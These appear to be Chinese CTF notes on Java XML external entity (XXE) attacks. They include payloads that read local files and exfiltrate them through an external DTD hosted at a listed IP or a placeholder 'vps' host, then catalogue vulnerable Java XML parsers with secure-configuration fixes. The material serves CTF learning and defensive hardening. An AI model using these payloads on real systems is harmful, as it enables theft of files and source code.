Pasted%20image%2020240118012019

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % file SYSTEM "file:///tmp/1.txt">
<!ENTITY % print "<!ENTITY send SYSTEM 'http://vps:port/?%file;'>">
%print;

Pasted%20image%2020240118015033

他说的这个报错的成功不了

Pasted%20image%2020240118015117

<!ENTITY % evil SYSTEM "file:///" >
<!ENTITY % print "<!ENTITY send SYSTEM 'netdoc://%evil;'>">
%print;

另外CDATE别忘了

<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE post [<!ENTITY % start "<![CDATA["><!ENTITY % go SYSTEM "file:///JustGoAround/src/main/java/com/example/justgoaround/MainController.java"><!ENTITY % end "]]>"><!ENTITY % dtd SYSTEM "http://8.140.17.117/evil.dtd"> %dtd;]> <post author="CTF Participant" id="0" title="234"><message>&all;</message></post>

然后evil.dtd里是

<!ENTITY all "%start;%go;%end;">

虽然但是,换行就莫名奇妙有问题

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE post [
    <!ENTITY % start "<![CDATA[">
    <!ENTITY % go SYSTEM "file:///JustGoAround/src/main/java/com/example/justgoaround/MainController.java">
    <!ENTITY % end "]]>">
    <!ENTITY % dtd SYSTEM "http://8.140.17.117/evil.dtd">
    %dtd;
]>
<post author="CTF Participant" id="0" title="234">
    <message>&all;</message>
</post>

展示一下吧
Pasted%20image%2020240118015759

整段复制,记录一下

一些可能造成xxe的组件及修复方式

javax.xml.parsers.DocumentBuilderFactory;
javax.xml.parsers.SAXParser
javax.xml.transform.TransformerFactory
javax.xml.validation.Validator
javax.xml.validation.SchemaFactory
javax.xml.transform.sax.SAXTransformerFactory
javax.xml.transform.sax.SAXSource
org.xml.sax.XMLReader
DocumentHelper.parseText
DocumentBuilder
org.xml.sax.helpers.XMLReaderFactory
org.dom4j.io.SAXReader
org.jdom.input.SAXBuilder
org.jdom2.input.SAXBuilder
javax.xml.bind.Unmarshalmarshallmarshalller
javax.xml.xpath.XpathExpression
javax.xml.stream.XMLStreamReader
org.apache.commons.digester3.Digester
rg.xml.sax.SAXParseExceptionpublicId

DocumentBuilder

java组件:javax.xml.parsers.*

组件漏洞代码:

public static void main(String[] args) throws  Exception {
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    DocumentBuilder db = dbf.newDocumentBuilder();
    String str = "<!DOCTYPE doc [ \n" +
    "<!ENTITY xxe SYSTEM \"http://127.0.0.1:8888\">\n" +
    "]><doc>&xxe;</doc>";
    InputStream is = new ByteArrayInputStream(str.getBytes());
    Document doc = db.parse(is);
}

修复代码:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();     
/*以下为修复代码*/            //https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#Java
//禁用DTDs (doctypes),几乎可以防御所有xml实体攻击
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); //首选
//如果不能禁用DTDs,可以使用下两项,必须两项同时存在
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);        //防止外部实体POC 
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);   //防止参数实体POC
/*以上为修复代码*/    
DocumentBuilder db = dbf.newDocumentBuilder();        
Document doc = db.parse(request.getInputStream());

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
String FEATURE = null;
try {
FEATURE = "http://apache.org/xml/features/disallow-doctype-decl";
dbf.setFeature(FEATURE, true);
// If you can't completely disable DTDs, then at least do the following:
// Xerces 1 - http://xerces.apache.org/xerces-j/features.html#external-general-entities
// Xerces 2 - http://xerces.apache.org/xerces2-j/features.html#external-general-entities
// JDK7+ - http://xml.org/sax/features/external-general-entities
FEATURE = "http://xml.org/sax/features/external-general-entities";
dbf.setFeature(FEATURE, false);
// Xerces 1 - http://xerces.apache.org/xerces-j/features.html#external-parameter-entities
// Xerces 2 - http://xerces.apache.org/xerces2-j/features.html#external-parameter-entities
// JDK7+ - http://xml.org/sax/features/external-parameter-entities
FEATURE = "http://xml.org/sax/features/external-parameter-entities";
dbf.setFeature(FEATURE, false);
// Disable external DTDs as well
FEATURE = "http://apache.org/xml/features/nonvalidating/load-external-dtd";
dbf.setFeature(FEATURE, false);
// and these as well, per Timothy Morgan's 2014 paper: "XML Schema, DTD, and Entity Attacks"
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
>..
// Load XML file or stream using a XXE agnostic configured parser...
DocumentBuilder safebuilder = dbf.newDocumentBuilder();

SAXBuilder

java组件:org.jdom2.input.SAXBuilder

漏洞代码:

public static void main(String[] args) throws  Exception {
    String str = "<!DOCTYPE doc [ \n" +
    "<!ENTITY xxe SYSTEM \"http://127.0.0.1:8888\">\n" +
    "]><doc>&xxe;</doc>";
    InputStream is = new ByteArrayInputStream(str.getBytes());
    SAXBuilder sb = new SAXBuilder();
    Document doc = sb.build(is);
}

修复代码:

SAXBuilder sb = new SAXBuilder();
sb.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
sb.setFeature("http://xml.org/sax/features/external-general-entities", false);
sb.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
sb.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
Document doc = sb.build(is);

SAXParserFactory

java组件:javax.xml.parsers.SAXParser / javax.xml.parsers.SAXParserFactory

漏洞代码:

public static void main(String[] args) throws  Exception {
    String str = "<!DOCTYPE doc [ \n" +
    "<!ENTITY xxe SYSTEM \"http://127.0.0.1:8888\">\n" +
    "]><doc>&xxe;</doc>";
    InputStream is = new ByteArrayInputStream(str.getBytes());
    SAXParserFactory spf = SAXParserFactory.newInstance();
    SAXParser parser = spf.newSAXParser();
    parser.parse(is, (HandlerBase) null);
}

修复代码

SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
spf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
SAXParser parser = spf.newSAXParser();

SAXTransformerFactory

java组件:javax.xml.transform.sax.SAXTransformerFactory。

漏洞代码:

public static void main(String[] args) throws  Exception {
    String str = "<!DOCTYPE doc [ \n" +
    "<!ENTITY xxe SYSTEM \"http://127.0.0.1:8888\">\n" +
    "]><doc>&xxe;</doc>";
    InputStream is = new ByteArrayInputStream(str.getBytes());
    SAXTransformerFactory sf = (SAXTransformerFactory) SAXTransformerFactory.newInstance();
    StreamSource source = new StreamSource(is);
    sf.newTransformerHandler(source);
}

修复代码:

SAXTransformerFactory sf = (SAXTransformerFactory) SAXTransformerFactory.newInstance();
sf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
sf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
StreamSource source = new StreamSource(is);
sf.newTransformerHandler(source);

SAXReader

java组件:org.dom4j.io.SAXReader

漏洞代码:

public static void main(String[] args) throws  Exception {
    String str = "<!DOCTYPE doc [ \n" +
    "<!ENTITY xxe SYSTEM \"http://127.0.0.1:8888\">\n" +
    "]><doc>&xxe;</doc>";
    InputStream is = new ByteArrayInputStream(str.getBytes());
    SAXReader saxReader = new SAXReader();
    saxReader.read(is);
}

修复代码:

SAXReader saxReader = new SAXReader();
saxReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
saxReader.setFeature("http://xml.org/sax/features/external-general-entities", false);
saxReader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
saxReader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
saxReader.read(is);

XMLReader

java组件:org.xml.sax.helpers.XMLReaderFactory

漏洞代码:

public static void main(String[] args) throws Exception {
    String str = "<!DOCTYPE doc [ \n" +
    "<!ENTITY xxe SYSTEM \"http://127.0.0.1:8888\">\n" +
    "]><doc>&xxe;</doc>";
    InputStream is = new ByteArrayInputStream(str.getBytes());
    XMLReader reader = XMLReaderFactory.createXMLReader();
    reader.parse(new InputSource(is));
}

修复代码:

XMLReader reader = XMLReaderFactory.createXMLReader();
reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
reader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
reader.parse(new InputSource(is));

SchemaFactory

java组件:javax.xml.validation.SchemaFactory

漏洞代码:

public static void main(String[] args) throws Exception {
    String str = "<!DOCTYPE doc [ \n" +
    "<!ENTITY xxe SYSTEM \"http://127.0.0.1:8888\">\n" +
    "]><doc>&xxe;</doc>";
    InputStream is = new ByteArrayInputStream(str.getBytes());
    SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
    StreamSource source = new StreamSource(is);
    Schema schema = factory.newSchema(source);
}

修复代码:

SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
StreamSource source = new StreamSource(is);
Schema schema = factory.newSchema(source);

XMLInputFactory

java组件:javax.xml.stream.XMLInputFactory

漏洞代码:

public static void main(String[] args) throws Exception {
    XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory();
    XMLStreamReader reader = xmlInputFactory.createXMLStreamReader(ResourceUtils.getPoc1());
    try {
        while (reader.hasNext()) {
            int type = reader.next();
            if (type == XMLStreamConstants.START_ELEMENT) {//开始节点
            System.out.print(reader.getName());
            } else if (type == XMLStreamConstants.CHARACTERS) {//表示事件字符
            System.out.println("type" + type);
            } else if (type == XMLStreamConstants.END_ELEMENT) {//结束节点
            System.out.println(reader.getName());
            }
        }
        reader.close();
    } catch (Exception e) {
    	e.printStackTrace();
    }
}

修复代码:

XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory();
xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false); 
xmlInputFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
XMLStreamReader reader = xmlInputFactory.createXMLStreamReader(ResourceUtils.getPoc1());

TransformerFactory

java组件:javax.xml.transform.TransformerFactory

漏洞代码:

public static void main(String[] args) throws  Exception {
    String str = "<!DOCTYPE doc [ \n" +
    "<!ENTITY xxe SYSTEM \"http://127.0.0.1:8888\">\n" +
    "]><doc>&xxe;</doc>";
    InputStream is = new ByteArrayInputStream(str.getBytes());
    TransformerFactory tf = TransformerFactory.newInstance();
    StreamSource source = new StreamSource(is);
    tf.newTransformer().transform(source, new DOMResult());
}

修复代码:

TransformerFactory tf = TransformerFactory.newInstance();
tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
StreamSource source = new StreamSource(is);
tf.newTransformer().transform(source, new DOMResult());

Validator

java组件:javax.xml.validation.*

漏洞代码:

public static void main(String[] args) throws  Exception {
    String str = "<!DOCTYPE doc [ \n" +
    "<!ENTITY xxe SYSTEM \"http://127.0.0.1:8888\">\n" +
    "]><doc>&xxe;</doc>";
    InputStream is = new ByteArrayInputStream(str.getBytes());
    SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
    Schema schema = factory.newSchema();
    Validator validator = schema.newValidator();
    StreamSource source = new StreamSource(is);
    validator.validate(source);
}

修复代码:

Schema schema = factory.newSchema();
Validator validator = schema.newValidator();
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
StreamSource source = new StreamSource(is);
validator.validate(source);

Unmarshaller

java组件:javax.xml.bind.JAXBContext / javax.xml.bind.Unmarshaller

需要指出:这个组件在jdk1.8默认不存在漏洞,在JDK1.6,1.7默认存在漏洞。参考

漏洞代码:

public static Object xmlToObjectXXE(String xml, Class<?> klass) throws Exception {
	JAXBContext context = JAXBContext.newInstance(klass);
	Unmarshaller unmarshaller = context.createUnmarshaller();
	return unmarshaller.unmarshal(new StringReader(xml));
}

修复代码:

public static Object xmlToObjectSafe(String xml, Class<?> klass) throws Exception {
	JAXBContext context = JAXBContext.newInstance(klass);

	XMLInputFactory xif = XMLInputFactory.newFactory();
	xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
	xif.setProperty(XMLInputFactory.SUPPORT_DTD, true);
	XMLStreamReader xsr = xif.createXMLStreamReader(new StringReader(xml));

	Unmarshaller unmarshaller = context.createUnmarshaller();
	return unmarshaller.unmarshal(xsr);
}

IS_SUPPORTING_EXTERNAL_ENTITIES为false时,外部实体不会被执行解析 当SUPPORT_DTD进一步为false时,引入DTD会导致报错。